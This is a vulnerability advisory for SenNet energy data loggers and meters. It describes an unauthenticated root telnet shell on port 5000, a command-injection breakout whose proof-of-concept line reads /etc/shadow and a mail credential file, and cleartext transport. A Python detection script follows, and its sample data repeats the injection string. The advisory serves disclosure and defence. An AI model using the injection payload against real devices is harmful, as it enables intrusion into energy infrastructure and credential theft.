SenNet Data Logger appliances and Electricity Meters Multiple Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT Advisory.

About

SenNet is a trademark of Satel Spain that offers monitoring and remote-control solutions for businesses. Our engineers develop, integrate and test the products of SenNet in our facilities in Madrid (Spain).
http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography: Americas and Europe regions

Target Audience / Industry: Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and therefore all SenNet models and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar Datalogger
Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal Datalogger
Model: OWA31
Serial Number: A05B89
Licence type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter Datalogger
Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity, gas, water) and other variables (temperature, humidity, presence, lighting, etc.), both for industries and for businesses in the tertiary sector.
http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of power generation plant. In this type of facility, it is essential to monitor and remotely control the devices involved in the process: inverters, meters, trackers, etc.
http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell

The appliance runs ARM Linux as the underlying OS. Telnet access is enabled on TCP port 5000. No authentication is required to connect to the remote shell: any user can connect to the shell and issue commands.

2. Shell service running with excessive privileges (superuser)

The service runs with superuser (root) privileges, thus giving privileged access to any user, without any authentication (exploited via the OS Command Injection described next).

3. OS Command Injection

The remote shell attempts to offer a restricted environment and does not allow executing system commands. However, it is possible to break out of this jailed shell by chaining specific shell meta-characters and OS commands. Because the service / application runs as 'root', OS command injection results in full system access.

Apart from energy logging data, the device stores sensitive information such as FTP, SMTP and other service login credentials, used by the application for its own functions as well as to connect to other external, public-facing servers.

PoC:

    # telnet IP 5000 2>/dev/null
    Trying IP...
    Connected to IP.
    Escape character is '^]'.
    $ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
    /bin/sh: $: not found
    uid=0(root) gid=0(root)
    /home
    root:$1$:13852:0:99999:7:::
    nobody:*:13852:0:99999:7:::
    nfsnobody:!!:13852:0:99999:7:::
      PID USER       VSZ STAT COMMAND
        1 root      2412 S    init
        2 root         0 SW   [kthreadd]
        3 root         0 SW   [ksoftirqd/0]
    root=postmaster
    mailhub=:25
    rewriteDomain=example.com
    hostname=_HOSTNAME_

4. Insecure Transport

All communications are clear-text and prone to sniffing.

+++++ Metasploit module will be released shortly. +++++
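As an added example (not part of the advisory or the vendor's code), the following Python snippet shows how a defender could flag captured telnet payloads sent to TCP/5000 that exhibit the meta-character chaining and sensitive-file reads described under finding 3. The port and file paths come from the advisory; the session records are constructed sample data.

```python
import re

# Port on which the SenNet appliances expose the unauthenticated shell (from the advisory).
SENNET_SHELL_PORT = 5000

# Shell meta-characters that chain commands and allow breaking out of the restricted shell.
META_CHARS = re.compile(r"(;|\|\||\||&&|`|\$\()")

# Files the advisory shows being read after breakout; their exposure is the impact to alert on.
SENSITIVE_PATHS = ("/etc/shadow", "/home/etc/ssmtp/ssmtp.conf")


def classify_session(dst_port, payload):
    """Return the list of alert reasons for one captured session (empty if benign).

    Only traffic to the SenNet shell port is considered; the restricted shell's own
    commands contain no meta-characters, so a clean payload yields no reasons."""
    reasons = []
    if dst_port != SENNET_SHELL_PORT:
        return reasons
    if META_CHARS.search(payload):
        reasons.append("shell-metacharacter chaining")
    for path in SENSITIVE_PATHS:
        if path in payload:
            reasons.append("sensitive file access: " + path)
    return reasons


def scan(sessions):
    """Run classify_session over (src_ip, dst_port, payload) records; return (src_ip, reasons) alerts."""
    alerts = []
    for src, dst_port, payload in sessions:
        reasons = classify_session(dst_port, payload)
        if reasons:
            alerts.append((src, reasons))
    return alerts


# Constructed sample sessions (hypothetical, not real captures).
SAMPLE_SESSIONS = [
    ("10.0.0.5", 5000, "show status"),
    ("10.0.0.7", 5000, "true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;"),
    ("10.0.0.9", 23, "true; id"),
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_SESSIONS):
        print(src, ", ".join(reasons))
```

Feeding this the command channel of real captures (e.g. reassembled telnet payloads from a network sensor) turns the PoC pattern into a detection rule; only the second constructed session is flagged.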